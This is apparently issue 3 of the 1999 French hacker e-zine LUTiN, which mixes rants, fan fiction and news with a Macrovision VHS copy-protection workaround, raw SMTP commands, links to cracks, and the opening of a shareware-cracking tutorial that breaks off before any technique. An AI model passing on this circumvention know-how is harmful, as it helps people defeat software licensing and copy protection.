+--------------------------------------------------------------------------+
           ___  __ ________   __  __
11 011110 |   ||  |__    __| |  ||  | 11 01101111 01100110 10110001 11010010
1100  101 |   ||  |  |  |.--.|   \  | 0110  0110111  0110001  0010011  11001
1 1 01011 |  /%\  -  |  ||  ||  |\  | 1 0 111110 1 110100 0 111001 1 000110
11001  01 |____|\___/\__/|__||__||__| 11001  1111000  0101110  0001111  0100

+---[ 3rd issue ]--------[ july 1999 ]-------------------------------------+
[ http://lutin.freeshell.org ]
[ lutin@listbot.com          ]





INTRO
--------------------->>

   Lutin, du latin _Neptunus_, dont le nom figure dans une liste de _demons_ du
 VII siecle. C'est un petit _demon_ espiegle et malicieux qui se manifeste 
surtout pendant la _nuit_.

   Nihilisme, ideologie qui refuse toute contrainte sociale et prone la 
recherche de la _liberte_ totale.

De nos jours ces etres sont des hackers, et leur combat est la liberte, et a 
ces fins, ce sont des concepteurs du chaos.





DISCLAMER  (A LIRE OBLIGATOIREMENT EN PREMIER )
--------------------------------------------------->>

TOUT LE CONTENU DE CE E-ZINE A ETE ECRIT UNIQUEMENT A BUT INFORMATIF,
NOUS VOUS DECONSEILLONS DE METTRE EN PRATIQUE QUOI QUE CE SOIT, QUI
FIGURANT DANS CE E-ZINE, SERAIT INTERDIT PAR LA LOI.
AVANT TOUTE CHOSE REFEREZ-VOUS A LA LOI EN VIGEUR DANS VOTRE PAYS. 
VOUS AVEZ DONC LE DROIT DE LIRE LES ARTICLES SUIVANTS, MAIS PAS CELUI 
LES APPLIQUER. AINSI, VOUS VOUS METTRIEZ DANS LA POSITION DELICATE DE RISQUER
DES POURSUITES JUDICIARES.
AVANT DE LIRE LA SUITE DE CE E-ZINE VOUS RECONNAISSEZ AVOIR PRIS 
CONNAISSANCE DE CE DISCLAMER ET DONC NOUS NE POUVONS ETRE TENU REPONSABLE
D'AUCUNS DE VOS ACTES.

  






EDITORIAL
--------------------->>

YEAAAAAAH!!
LE numero 3 de lutin, enfin! C'est pas trop tot!
Le groupe s'aggrandit legerement, mais c'est pas encore assez, a mon avis.
Donc, si vous voulez integrer les groupe, voyez un peu plus loin!
J'espere que ce numero est a la hauteur de vos attentes, de toute maniere le
prochain sera quand meme encore mieux !!! Il devrai beneficier de "l'effet 
vacances scolaires" et etre plus riche en articles de toutes sortes ;) Et
avec un peu de pot vous n'aurez pas 2 mois a attendre cette fois ci.
Rendez vous sur le site, sa sortie sera annoncé des son approche. 
A envisager aussi sur le site courant vacances: nouvelles productions et
bidules/softs a downloader, nouveaux cracks, nouvelles sections et/ou projets...
enfin, affaires en cours...tenez vous au courant.
Tiens, tant que j'y pense:
Le site du LUTiN change de place:
>> http://lutin.freeshell.org  
Et pour nous joindre, voici notre nouvelle addresse: 
>> lutin@listbot.com

Enjoy diz ezine & have phun!!!!!


-----
Vous avez du le constater, le zine est desormais regroupé dans un seul fichier;
je trouvais le fait d'en avoir plusieurs jusqu'alors plus pratique pour trouver
un article, mais finalement, cela me semble plus pratique pour le lecteur de ne
pas avoir a ouvrir 36 files ;) [ND moi: je sais, j'suis paradoxal]
Afin de trouver rapidement l'article souhaite, il suffit de faire une recherche
par le numero de l'article, like: #3 ..... :p
--
Afin de vous de ne pas vous perdre dans le sommaire, vous trouverez des 
pictogrammes indiquant la nature de l'article ainsi qu'une lgende les 
expliquants. 
-----


    
JOIN THE LUTIN!!!
---------------------->>
Bin ouaih! Pourquoi pas!? Vous aimez le zine et vous avez pleins de choses
a ecrire... Donc nous avons besoins de vous et je suis sur que vous avez
besoin de nous.. Donc n'hesitez pas !!  
lutin@listbot.com
N'oubliez pas, nous sommes avant tout un groupe, et ce ezine est notre moyen
d'expression..




Table of contents
--------------------->>

legende des pictos:  H: hacking / P: phreaking / B: bidouilles / C: cracking
                     D: defonce,delire / R: reflexions,coup de gueules,...
			   S: news, infos de la scene h/p/v/...
                     

1 (?) Niouzes, Erratas & Divers         
--+-+---------------------------------------------------------------------------
2 (R) SI PETITS... SI INUTILES...  mais tellement gamins...        >Shiva
--+-+---------------------------------------------------------------------------
3 (R) Comment negocier avec le diable (on Kosovo war)              >Blunt
--+-+---------------------------------------------------------------------------
4 (R) L'homme, derniere espece sur la Terre                        >Blunt
--+-+---------------------------------------------------------------------------
5 (B) MACROVISION ou pourquoi je peux pas copier mes k7 videos     >Blunt
--+-+---------------------------------------------------------------------------
6 (D) L'histoire des mainates 2                                    >Airlac 
--+-+---------------------------------------------------------------------------
7 (C) Les bases pour venir a bout de son premier shareware         >SyntaxError
--+-+---------------------------------------------------------------------------
8 (D) l'EpHEDRINE                                                  >Thc 
--+-+---------------------------------------------------------------------------
9 (?) web links de base                                            >blunt
--+-+---------------------------------------------------------------------------
10(B) ATTRAPE LAMER ou HOW 2 FUCK FT AGAIN                         >blunt
--+-+---------------------------------------------------------------------------
11(R) L'OS qu'il vous faut ?                                       >SyntaxError
--+-+---------------------------------------------------------------------------
12(R) HACKERS' CYBERNATION  ou  COMPLAINT OF ZE E-UNDERGROUND      >Blunt
--+-+---------------------------------------------------------------------------
13(S) Melis-sa-va-peter !!!                                        >SyntaxError
--+-+---------------------------------------------------------------------------
14(S) BackOrifice 2000 aka BO2k, chronique d'un coup mediatique :) >SyntaxErrror
--+-+---------------------------------------------------------------------------
eND | mOT.dE.lA.fIN



+-----[ #1 ]------------------------------------------------------------------+

                        Niouzes, Erratas & Divers
                     ++++++++++++++++++++++++++++++++


1- errata lutin numba 2
 Je voudrais faire une petite rectification au niveau d'un mot de vocabulaire
employe dans l'article "il n y a que des haches..." du numero precedent dans  
lequel j'ai du utilise un peu trop souvent le terme de _nation_,
alors que le propos etait souvent l'_etat_ ... voila ;)
Desole, mais je n'ai pas l'habitude de me relire.
--blunt


2- school

The brain is a wonderful organ; it starts working the moment you get up
in the morning, and does not stop until you get to school.


3- BO 2 

Eh oui, Back Orifice revient dans une nouvelle version: BO2K
Sortie prevue pour le 10 Juillet. 
12/07: tiens, tiens, on dirait que les gars de CDC aiment bien se faire
attendre... (cf #14)

4- errata lutin numba 1

A propos des de l'article sur les servers mails du premier numero, j'ai oublie
de preciser que l'on peut s'identifier au server:
helo <hostname>

Et aussi, il est aussi necessaire (mais pas aubligatoire) de rajouter des '<' 
ou '>' autour des url, par ex:
mail from:<gogo@pouic.com>


5- starwars

Le premier pirate de starwars qui a mit a dispostion le film sur le web se 
serait fait choper, ahlala... faut le faire quand meme!
Bon, cette fois-ci, c'est quoi ? Encore un mouchard des produits kro$oft ??
humff!!

6- CRACKZ

Vous pouvez trouvez les CRACKZ de SyntaxError sur sa page ouaib:
http://lutin.freeshell.org/syntaxerror
 


+-----[ #2 ]------------------------------------------------------------------+

                ------------------------------------------
                        SI PETITS... SI INUTILES...
                          mais tellement gamins...
                ------------------------------------------


  Je voudrais, par cet article mettre le doigt sur un sujet qui me semble
important : L'espece humaine.
  J'aimerais comprendre les causes de nos actions qu'elles soient destructrices
ou bien racistes...
Comprendre pourquoi l'etre humain est si... inhumain !

  Tout d'abord un petit rappel de biologie sur l'histoire de la vie :
  La vie sur la Terre est apparue grace (?) a divers facteurs :

        - La planete est situee a une distance du soleil pour que la Vie puisse
apparaitre. La temperature est ideale (ce qui n'est pas le cas sur les autres
planetes...)
        - Il y a une presence FONDAMENTALE d'eau LIQUIDE,
        - Une couche d'ozone s'est formée durant de longs millenaires pour assurer
une protection contre les UV, rayons destructeurs de la Vie, et pour
maintenir l'oxygene sur la planete...

  Ensuite, reflechissez a l'apparition de la Vie :
  Une fois tous les précédents facteurs réunis, la Vie va pouvoir faire son
apparition... Mais doucement... Durant des millions d'années...

        - Tout d'abord la CELLULE, etre primitif... tres primitif...
        - Ensuite, une espece d'etre multicellulaire,
        - Puis vint une sorte de poisson, capable de respirer l'oxygene... La
conquete du monde terrestre se prepare...
        - Puis, le poisson se transforme... Il peut desormais se passer du milieu
aquatique...
        - Le mamifere se sert de ses mains pour attraper des objets, de ses
jambes pour se deplacer...
        - Puis arrive un etre qui ressemble physiquement vaguement a ce que noussomme, il reflechie, son cerveau se developpe... Il met au point des systemes
simplistes...
        - Puis l'Homme se cree, il est intelligent, est capable de concevoir dessystemes sophistiqués, en parti grace a son pouce opposé aux autres doigts...
        - L'Homme conquiert de nouvelles terres ou il s'installe en massacrant
les indigenes...
        - L'Homme passe par une periode ou il est dirige par un homme qui a toutles pouvoirs. Le droit de vie ou de mort sur tous ses sujets... Phase
comprehensible de l'Evolution...
        - L'Homme se revolte, il devient Citoyen. L'egalite se prepare. Tout le
monde a le droit de donner son avis sans avoir la crainte de se faire
eliminer...
        - L'Homme avance dans la recherche scientifique, il comprend la Vie...
Il devient capable de creer toutes chose...
Il decouvre une source d'energie avec le nucleaire, il peut agir sur des
cellules, des organes...
        - L'Homme utilise son savoir pour sauver des vies, pour mieux vivre...

  Et c'est la que ca se gatte...
        - L'Homme utilise son savoir pour fabriquer des bombes, pour devancer laNature sans avoir une idee des problemes a long termes...
        - Et le pire de tout : L'Homme est pret a tout pour... L'ARGENT !!!

  Vous voyez que vous etes la, en vie, par un long procede naturel de plusieurs
milions d'années. Vous avez la possibilité de vous revolter, de participer a
votre futur, de creer une evolution ou la liberte et l'egalite seront vraiment
respectees
  Mais au lieu de ca, l'Homme tue, massacre, detruit.
Il juge les gens par leurs aspets exterieurs, par leurs couleurs de peau, il
cree 2 mondes dans une meme planete, le riche et le reste.
  Pourquoi s'occuper des autres... Un etre humain vit durant 80 ans environs,
  Pourquoi les gacher en s'entre-aidant, le but etant de passer son existence
dans le luxe...


  L'Homme se croit evolue, il n'en est point...
Il en est encore dans une phase de transition ou il decouvre la theorie mais ou
la pratique n'est pas encore encrée dans les moeurs... C'est dommage...
Des miliard de dollards depensés dans une guerre inutile aux raison implicites
aurait bien ete utiles pour un pays qui creve de faim, qui se fait ronger par lapauvrete...
Que l'on y aille un bon coup... Que TOUT les etres humains soit egaux, dans de
condition economiques similaires et libres... Une fois se but atteint, on pourradire enfin que l'Homme devient evolué...


                                                        Le 16 Juin, 2h33.

        George Orwell s'est trompe de 20 ans trop tot.


                                                SHiVA
                                        (shiva@citeweb.net)

Article dedie aux personnes qui arrivent a s'aimer dans ce bas-monde... Qu'ils
continuent... pour le bien de l'humanite (à Elodie et Dimitri)



+-----[ #3 ]------------------------------------------------------------------+


Comment negocier avec le diable.
--------------------------------


L'esprit humain est vraiment tordu.
Une guerre s'est deroulee, je subodore que vous etes au courant. On nous montre
un homme cruel, un dictateur, sans foi ni loi, fasciste, une bete qui a mis
en place un nettoyage ethnique, crime le plus horrible qu'a connut notre
chere Terre.
Il faut le liquider, assurement; commence alors une guerre qui vas durer
plusieurs dizaines de jours. Des innocents sont meme tues par les memes
personnes qui veulent defendre l'ordre mondial.

Bon, ca on la compris, on nous l'a montrer comme le Malin incarne, et puis...

Et aujourd'hui, on arrete tout, non, plus de guerre, plus besoin: on a
negocie!!
D'abbord on lui fait la guerre, et apres on marchande.

Ou je me fout le doigt dans l'oeil, ou la il y a gros foutage de gueule.
A votre avis ?

La, j'avous, je suis perplexe, je suis un peu perdu, et surtout ebahi
par tant de contradictions!

Perdu, oui perdu..

Un grand nombre de questions aborde mon pauvre cerveau deborde:
pourquoi negocier avec cet homme ?
pourquoi ne pas l'avoir fait avant ?
et finalement cette guerre, a-t'elle servie les hommes opresses ?
qu'a-t'elle apporter?

Franchement j'ai du mal a croire qu'elle ai servi a faire pression
sur Millosevitch.... vraiment du mal!

dois-je en conclure qu'elle n'etait pas justifie? en plus d'etre faites
n'importe comment - c'est a dire a la tronconeuse, avec des ecorchures un
peu partout- elle aurait ete faites avec pour seule motivation un 
probable motif personnel interesse!?

vraiment, on s'est vraiment fait baiser.... enfin, je crois...



blunt
(blunt@mail.dotcom.fr)
[ICQ#37261128]

+-----[ #4 ]------------------------------------------------------------------+


                    L'homme, derniere espece sur la Terre
                  #########################################      


INTRO: ames sensibles, s'abstenir svp.
Je crois qu'on peut dire que cette nuit la je me suis lache... ca fais du bien.
On se sent leger, vous devriez esssayer.
Desole d'etre aussi radical, mais faut bien se secouer de temps en temps, 
le probleme d'un tel article est qu'il ne touche pas les bonnes personnes.
Vous, acteur ou spectateur de l'underground vous avez de bonnes chances d'etre
deja initier a reflechir par vous-meme....
Ce n'est meme pas sur, remarquez... Avec l'arrive massive de Lamers qui
tentent de prendre d'assault le monde underground car il devient a la mode.




derniere espece ?
-----------------
J'ai du mal a realiser. Je ne sais pas vous, mais moi j'ai vraiment du mal!
C'est quand meme pas facile, et dire que nous sommes la derniere espece
biologique sur Terre.

Ca pourrait etre merveilleux, comme un conte de fee pour enfant. Oui, nous
pourrions etre l'espece la plus aboutit, la plus intelligente, la plus
doue, ... juste 'la plus'...
Apres tout, si nous sommmes des humains, et si les autres especes ne sont
que des animaux, ce n'est surement pas pour rien !
aaaaaah, j'espere que vous vous sentez a l'aise, que l'air que vous respirez estfrais, doux et limpide. Car vous etes peut-etre un etre parfait....

ahah
Je vais vous dire quelque chose, j'espere ne pas trop vous blesser dans votre
amour propre d'humain, dans votre egoisme d'etre 'evolue', dans votre
individualisme superieur; mais j'ai une grave revelation.
Vous, nous, moi.. "l'humain" n'est qu'une espece animale comme les autres, et
peut-etre pas des plus senses.

Est-ce dur a digerer? Je n'ose esperer de vous avoir choquer, car maintenant, jevais develloper et meme argumenter.

Mais, me direz-vous, comme est-ce possible, nous nous tenons debout,
construisons des villes pas milliers, entretenons des relations 'humaines'
a longueur de journee sans devorer personne... donc nous communiquons, nous
avons pour cela un language!! Et puis, nous pensons! Nous avons une AME! Oui,
nous, nous avons une ame! N'est-ce pas extraordinaire? Nous avons meme
domine toutes les autres especes, c'est pas une preuve ca ???


huumm, vous y croyez vous ?
---------------------------
Si l'espece humaine sera surement la derniere espece de l'evolution de la vie
sur Terre, ce n'est pas parce qu'elle est la plus aboutit, non; loin de la.
A mon avi, elle sera la derniere car elle se demerdera pour aneantir toutes les
autres formes de vie pour enfin s'aneantir elle-meme.
Je suppose que vous avez quelques penses (c'est bien le propre de l'homme, non?)du style: "bin voyons, c'est tout?? rien que ca!? juste detruire toute forme de
vie ??"
A laquelle je repondrais: eh, bien non, ce n'est pas tout.

Voila, nous avons eu, nous avons toujours eu, un comportement nombriliste.
Egoiste envers les autres especes, individualistes envers ses semblables.
Il est amusant de noter que n'importe quelle espece (sauf l'homme)
a present dans sa tete des notions basiques et simplistes de sauvegarde de
l'espece.
Seulement, l'homme n'a jamais compris qu'il doit la vie non seulement a sa
mere (sa moman koi!) mais aussi a la Terre, La mere originelle; celle qui
a permit la vie.
Celle qui sans quoi il n'y aurait rien de vivant dans la partie que nous
connaissons de notre univers. Il me semble que nous lui devons beaucoup, non?
La vie, des milliards d'especes animales et vegetales.


congratulations
---------------
Et evidemment dans notre grande logique, nous lui rendont bien. Nos manies
ancestrales le montre clairement.
Qu'ont toujours fait les humains?? Ils se sont installes dans un endroit,
ont epuises ses ressources et ont saccages l'environnement, puis sont alles
voir plus loin trouver de nouvelles ressources et matieres premieres.
Sale habitude que celle-ci.
Nous avons toujours fait cela, mais il y a moment ou ca va coincer. Aujourd'hui
nous commencons a apercevoir les limites du tunnel.
Plus le niveau de vie global des Humains augmentent, plus nous faisons de
degats.
L'homme devient de plus en plus puissant et chatie de plus en plus fort sa
pauvre Terre mere de l'avoir enfante.
Autrement dit, outre la reconnaissance du ventre, nous nous detruisons nous-memeen brisant notre lieu de vie. Est-il si insignifiant pour nous ?

Peut-etre que personne ne pense a assurer la vie des ses enfants et petits-
enfants? egoiste a ce point, ca fait mal au coeur... mais ce n'est pas
moi qui souffre, c'est notre planete qui agonise, et nos enfants qui
hurleront de douleur.
Ils crieront et crieront contre leurs cons d'ancestres qui n'ont pas ete
capable de preserver le don qui leur a ete fait.

Il m'arrive de penser qu'il est etrange de ne pas avoir decouvert d'autre
forme de vie 'intelligente' dans l'univers, ca viendra surement un jour,
bien sur...
Mais quand meme, si la terre etait la seule planete ou la vie s'etait
devellopee, la seule, l'unique, ca serait extraordinaire.

On en viendrait presque a supposer que toutes les energies (les forces)
creatrices qui ont etes misent en branle pour creer l'univers, ses
astres incadescents, ses planetes, ses trous noirs... toutes ces gallaxies...
Toutes ces forces monstrueuses, inimaginables pour quiconque, elles pourraient
avoir ete mise en place dans le seul but de creer la vie sur Terre.


points de vues
--------------

Et nous, nous sommes a deux doigts de tout foutres en l'air, c'est quand meme
beaucoup de responsabilites pour les pauvres loques que nous sommes.
Et si vous voulez mon avi, si nous nous trouvons si intelligent, c'est bien
normal, c'est une simple question de point de vue.. Le point de vue change
selon l'observateur.

Oui nous communiquons et contruisons des cites, et nous ne sommes pas les seuls
sur Terre. D'autres especes communiquent et ont des languages, d'autres especes
batissent de cites.

Quand a notre ame... laissez moi rire.. qui a pondu cette inepsie!!?? Nous
n'avons pas plus d'ames qu'un ver de terre. Cela peut plaire a certain que nous
ayons une ame, je respecte vos penses et croyances et je suis tout a fait d'accord avec vous! Neanmoins, si nous avons une ame, ce ver de terre a aussi une ame
et la meme que la notre. Desole si votre religion ne vous pas appris cela,
je ne vous expliquerai pas pourquoi, je n'ecris pas pour reflechir a votre
place (j'en serai bien incapable), mais juste pour tenter de vous ouvrir un peu
les yeux ;)

Je ne contredirai aucune religion, aucune doctrine, etc...
Cependant, je tiens a preciser qu'il ne sert a rien de croire.. Croire n'apporterien, aucune certitude ni aucun savoir...
Decouvrir, penser, remettre en question chaque jour de l'humanite est le seul
moyen d'acquerrir la connaissance necessaire a une vie terrestre et spirituelle.

Le sujet est vaste, je ne l'ai qu'efleure. Il me tient a coeur, je ne suis
pas le seul....


from outer space
----------------
Donc, si nous nous installons quelque part, puis que nous le desertons pour nousinstaller ailleurs; apres avoir rendu l'endroit invivable, pourquoi ne pas
faire de meme le moment venu, nous partirions de la Terre pour nous installer   
sur une autre planete ou dans un station spatiale ?? hein hein ?? pkoi pas ?

Eh, bien je dirais d'abbord que la fuite n'est pas une solution. Et puis
ensuite, je ne sais pas si vous etes deja au courant, mais nous avons deja
commence a transformer l'espace a proximite de la Terre en decharge.
En effet, outre 700 satelittes artificiels, on trouve pas moins 10000 dechets,
que nous avons nous meme jetes la; autour de la Terre.
On trouve de tout, boulons, cles a molette, cuves, etc, etc....
Cependant voila, dans l'espace il n'y a pas de biodegradation; et un boulon
lance dans l'espace se met en orbite autour de la terre et continue a tourner
autour inlassablement.
Cependant un boulon dans l'espace, en orbite peut aracher la jambe de quelqu'un,
les spationautes sont deja en danger par leurs propres fautes. Car des objets de
10ko sont aussi en orbite, et les degats peuvent etre beaucoup plus importants.
Une cuve s'est deja ecrase sur la terre, il y a deja un ou deux blesse par des
objets (laisse par l'homme dans l'espace) penetrant l'atmosphere.

Essayez alors d'imaginez a quoi ressemblera le vide intersideral quand nous
le frequenterons quotidiennement...
D'apres moi, c'est pas gagne ;) On n'est pas encore sortie d'affaire.




blunt
(blunt@mail.dotcom.fr)
[ICQ#37261128]




+-----[ #5 ]------------------------------------------------------------------+



        -----------------------------------------------------------
        MACROVISION ou pourquoi je peux pas copier mes k7 videos !?
        -----------------------------------------------------------


[MODE antilamer ON!]

Je ne sais pas vous, mais moi ca me tue de payer un film sur k7 video
de 140 a 160 francs (de 21 a 24 euros) et de perdre ma video parce qu'un con
de magnetoscope ma bousillé la bande !!
Enfin, il peut etre interessant de vouloir faire une copie d'un film pour garderl'original en lieu sur afin d'eviter de le perdre.

[MODE antilamer OFF!]

Cependant voila, afin d'eviter le copiage de videos, les concepteurs ont mis
au point un procede efficace de protection contre la copie. Afin d'eviter
que (par exemple) des gens mal intentionnes veuillent copier des videos qu'il
loueraient avant de les rendres.
Voila, l'idee est tres louable.

Mais la 'copie de sauvegarde' d'une video est alors improbable; qu'il est
frustrant de tenter de sauvegarder une video, et de se rendre compte au bout
de la duplication que le resultat est un amas de couleur ne ressemblant meme
plus a une image.
Le fait de faire une copie de sauvegarde ne me semble pas plus illegal que
d'enregistrer un film diffuse a la TV. Je ne connais l'opinion de la loi sur
ce sujet, aussi je vous demanderai de vous referer a la loi en vigueur dans
votre cher pays. Je n'aimerai pas vous inciter a faire quelque chose d'illegal
quand meme ;)

Donc, premierement, avant de tenter de copier une video, sachez qu'il y a un
moyen de savoir si celle-ci serai eventuellement protegee par le procede
anti-copie, j'ai nomme: Macrovision !!!
Le procede est applique sur certaine videos; que l'on peut reconnaitre a
l'estampillage de la k7:

vous pouvez distinguer au dos d'une k7, vers le bas, un pictogramme composé d'un
drapeau francais sous titre: "Fabrique et duplique en France" suivi du code
"edv. 11" ; et bien il s'agit la d'un moyen de reconnaitre les video qui
sont proteges, et celles qui ne le sont pas.

Les autres (celles sauvegardables) sont affubles d'un numero d'"edv." differents
en rapport de l'endroit de duplication.

Voila c'etait pas dur.

Donc, maintenant que vous savez quelles de vos k7 vous allez pouvoir
sauvergarder, penchons-nous sur le procede.


Je vous l'avouerai je ne sais pas (encore) exactement comment il fonctionne,
je sais seulement qu'il ne s'agit pas d'une puce ou d'un quelconque element
electronique rajoute sur les k7 (tres tres logique, je sais:).
Il s'agit d'un procede ajoute au signal video sur la bande magnetique des videos
. Lorsque la sortie du magnetoscope est relie a une TV, il n'y a aucun probleme.
Mais si vous realisez le montage de sauvegarde classique suivant:

1er magnetoscope (lecteur)  --> 2nd magneto (recorder)  --> TV

Il se trouve que l'image de destination sur le 2nd magnetoscope sera brouille,
en partie (ou totalement) selon votre magneto.
[N tek: En realite, le signal augmente et diminue l'amplitude de l'image en
continue. Ce n'est donc pas la peine d'essayer d'amplifier le signal video,
car on obtiendrait des passages suramplifie]
Impossible donc de sauvegarder en paix; il se trouve que le signal nique l'image
lorsque il arrive sur un 2d magneto.

Neanmoins, la sauvegarde doit pouvoir se faire grace a un montage tres simple:

magneto #1 (player) -------->  TV    -----------> magneto #2 (recorder)
                    S       E        S          E


ou S est une sortie et E une entree.
Il ne vous reste plus qu'a trouver les cables ideaux; car en effet selon votre
TV, il sera + ou - evident de brancher la sortie de votre TV sur un magneto?

voila, avec ca deja, vous serez a meme de savoir quelle video vous pouvez
sauvegarde sans avoir a peniblement essayer sans savoir si cela fonctionnera.


blunt
( blunt@mail.dotcom.fr )
[ICQ#37261128]

ps: Macrovision est utilise aussi par des distributeurs 'ricains.. mais bon, 
juste sur le reseau de distribution, il me semble, a savoir, les USA...



+-----[ #6 ]------------------------------------------------------------------+

                         L'histoire des mainates 2

Yo!

Me revla, oui MOI, Airlac, coz ThC c'est un gros
glandeur, alors ils arrete les Mainates pour le moment.
Faut dire que c'est moi qui faisait 99% de l'histoire,
75% de l'ecriture, et lui 100% des fautes d'ortographes !! :)

Bon allez on y va !

Tite intro:

Jadis dans un monde lointain, Mainatis, eu lieu la plus grandes des guerres.
Evil Gates, le chef supreme des LamerZ parvint par de sombres sortileges,
a Franchir la porte du Meerletheron, qui separe le pays des mainates de celui
des dieux.
Il abatit le Grand Dawa, et devint tout puissant.
Les LamerZ se sentirent alors puissants et prirent pour alies les Names.
Face a cette alliance, les Bon Mainates de la Confederration du Ouitheron.
n'eurent d'autre choix que d'entrer en guerre contres leurs ennemis hereditaires.

Retour a la ou on en ete reste:

Tandis que les natmes envahissaient le nord de Mainatis, et que la
confederration perdait tout espoir face aux puissants LamerZ allies aux
mauvais mainates, les InksOunkses se preparaient.
Leurs forces etaient telles:
Les InksOunkses, descendants des Mangeoriens, hostiles aux Natmes,
surentraines apres des siecles de guerrilla contres eux, dopes a la
Vachequiri.
La pluspart des la population de l'Empire de sang Mangeorien.
Les Lacustres, mainates apparentes aux Grands Meerls.
Et bien sur les confederres, et leurs colonnies australes, peuples
de Mangeoriens.

Du cote des enemis:
Les LamerZ, toute une race aussi vielle que les mainates, unie derriere
Evil Gates, preparant la guerre depuis des millenaires, forgeant
a l'ombre des montagnes Lamesques, forces armes, et concevant forces
puissants sortileges.
L'Empire Natme, qui vaincu les Mangeoriens, encore puissant, et suivie
par une partie de la population, d'origine Pahouais.

Charlegorn Wazeron venait de decouvrir sa destinee, et ses pouvoirs,
les Inksounkses le suivaient, et tandis que la confederration
subissait l'assault des Natmes; il se preparait a soulever l'Empire.
La nouvelle de l'apparition du Grand Mainate se rependit tres vite
par le systeme d'information Inksounkse, et de part le vaste desert,
tous les clans lui firent rapidement allegeance.
Pendant ce temps les LamerZ renouvelerent le sort desertificateur
sur le Ouitheron, les confederres, peu preparee a ce malefice,
subirent de nombreuses defaites.
Les Natmes se ruerent vers le Nord, evitant soigneusement le Royaume
Lacustre, et envahirent la Confederration jusqu'en Perchoiresquie.
Les Ouitheroniens tremblerent a l'idee de la tombee de cet etat puissant,
un des fondateur de la confederration.
Cet a ce moment que Charlegorn prit le pouvoir.
Non seulement il se fit entendre des chefs de clans, mais aussi de la population de l'Empire, et en une journee, les Natmes perdirent le pouvoir de leur
empire millenaire.
Da la, ces legions volerent au secours de la confederration, les confederres
errants, loin de leur commandemant, transfere loin dans l'Est, se rangerent au
cotes des Mangeoriens.
Ces legions fondirent sur les Lamo-Natmes isoles dans le sud de la confederration, et les detruirent.
De l'empire reconquis, ils chasserent les ennemis jusqu'a l'Est des Montagnes
Lamesques, puis au dela, finalement seule la Bilgetzie, region d'extreme Orient, fut encore conservee par les Lamo-Natmes.

  L'Empire LamerZ meme etait tombe !

La guerre etait terminee.
Laissant deriere elle des milliers de morts, un Mainatis desertique.
Et une confederration devastee, et desorganisee.

Alors le Grand Mainate parcouru la planete, et les Ouitheronien lui firent
allegeance.
Touts les mainates etaient maintenant ranges derriere leur Messie.
Celui ci restaura l'Empire Mangeorien, agrandi du Ouitheron et du Lamalh
enfin reconquis, L'Empire Mainate.

La Vachequiri se repandit, permetant la vie dans le desert, le Lamalh fut
delamsise, et les limes contre la Bilgetzie renforcee.
Tous croyaient vivre le NeoWazeron, le second age d'or des mainates...

Pourtant a mesure que le Grand Mainate Grandissait en pouvoir, et l'Empire
en Grandeur, le Chef-Dieu perdait contact avec la realite.
Un jour il entreprit en secret un Voyage vers l'Extreme Septentrion,
et disparut.
Un seul recit, anonyme raconte cette dispariton.
Selon celui-ci, le Grand Mainate s'approcha des ruines de la porte
du Meerletheron, il y eu une grand lumiere, quand l'obscurite retomba,
il avait disparu.
Au pied de la porte, on trouva un mainaton, aux pattes et bec jaune,
chose impossible, car touts les organismes etants satures de Vachequiri,
touts les mainatons concus naissaient gris ...
On comprit alors que cet enfant n'avait pas ete concu, mais etait
la partie Mainatesque du Grand Mainate, Charlegorn.
La partie divine, Le Bear Meerlisik Wazirian, etait partis accomplir
son destin.
D'aucun dirent qu'ils etait partis abattre Evil Gates, et qu'il s'assit
sur le trone de l'Univers.

N'etait il pas destine a etre le successeur du Grand Dawa ... ?


Voila c'est tout pour ce numero!
Et j'ai rien fumme pour ecrire ca :)
Pardon pour l'ortograf' ...

Si vous ne saisissez pas toutes les references (NeoWazeron, Grand Dawa ...)
vous inquietez pas, j'ecrirais ces parties de l'histoire de l'univers
plus tard ...


Allez ! Fumez de la beuh, portez des converses, et mettez des capottes !


...............ET RENDEZ VOUS DANS LUTiN #4 POUR LA SUITE..............


-AiRLAC



+-----[ #7 ]------------------------------------------------------------------+



                               Cracking:
           Les bases pour venir a bout de son premier shareware...

                                  SyntaxError, syntax3rror@usa.net

           Cracker, c'est dur, c'est long, c'est chiant quand on a pas
     encore realise LE premier crack liberateur qui donne confiance en
     soi et motive pour les prochains essais...
           "essais" parce qu'il ne suffit pas d'une seule tentative
     pour commencer a bien cracker. Les protections des sharewares ne
     sont pas toutes aussi efficaces et pour un debutant, tomber sur un
     programme facile a cracker, c'est une chance qui ne se laisse pas
     passer...

           Passer plusieurs heures sur un meme programme pour essayer
     de le cracker fait forcement progresser, surtout les newbies...
     Avec l'habitude, on apprend vite a reconnaitre les protections les
     plus faibles (generalement le crack se fait en 10 minutes ;).

           Entre 10 minutes et 3 heures, il y a un pas que l'on peut
     franchir vite si on suit ces regles d'or (elles me sont indispensables)
       - Je commence par m'acheter PCMax chez un marchand de journaux.
         C'est la premiere etape, la source en matiere premiere: le
         Shareware :oD, qui par definition dispose de protections qui limitent
         son usage aux personnes non-enregistrees. J'installe et je
         desinstalle en serie la plupart des sharewares du CD, je les lance
         et je voit si ca se crackerait bien ou pas (juste a la gueule).
         Si oui, alors c'est parti :). Et tous les mois mon stock de
         sharewares se renouvelle... merci PCMax :))

       - De la musique tranquille en bruit de fond (pas de metal ni de techno,
         pas de blabla sinon on peut pas se concentrer). Le conseil du chef:
         un petit Massive Attack.

       - Faire confiance au multitache de Wouinouin98 (et le solliciter !!!).
         On a toujours besoin de faire tourner plein de programmes en meme
         temps ou d'ouvrir des philes de crack, l'API Reference de Cro$oft,
         etc.

      -> Ces etapes n'ont qu'un but: SE MOTIVER !!! Que l'on soit ou non
         capable de cracker des sharewares en 10 minutes, la plupart des
         programmes nous resistent quand-meme. Mais quand on acquiert un peu
         d'experience, c'est un truc ideal pour remplir des journees (ou des
         nuits :) a bidouiller devant son ecran...


         Bon si ne vous etes pas encore barre c'est que vous correspondez
     au profil du parfait cracker ;). Maintenant il est temps de faire
     ses preuves... Mais avant-tout, il faut faire un choix... et meme
     plusieurs choix.
       - D'abord au niveau du logiciel: Certains crackers preferent SoftIce,
       d'autres W32Dasm.
          Le premier est un debugger qui permet de controler pas ~E pas
       l'execution du programme (en assembleur) jusqu'a arriver a l'endroit
       de la protection. Il est particulierement bourrin avec l'OS (il coupe
       le multitache quand il tourne et meme l'horloge du systeme s'arrete !).
          Le deuxieme est un desassembleur sous Windows qui permet de voir
       les sources assembleur de l'executable pour etudier la protection. Il
       dispose d'un debugger plutot pas mal et il est intuitif.
          Tant qu'a faire son choix, autant debuter avec W32Dasm qui est moins
       difficile a aborder.

       - Ensuite au niveau de la technique de crack en elle meme:
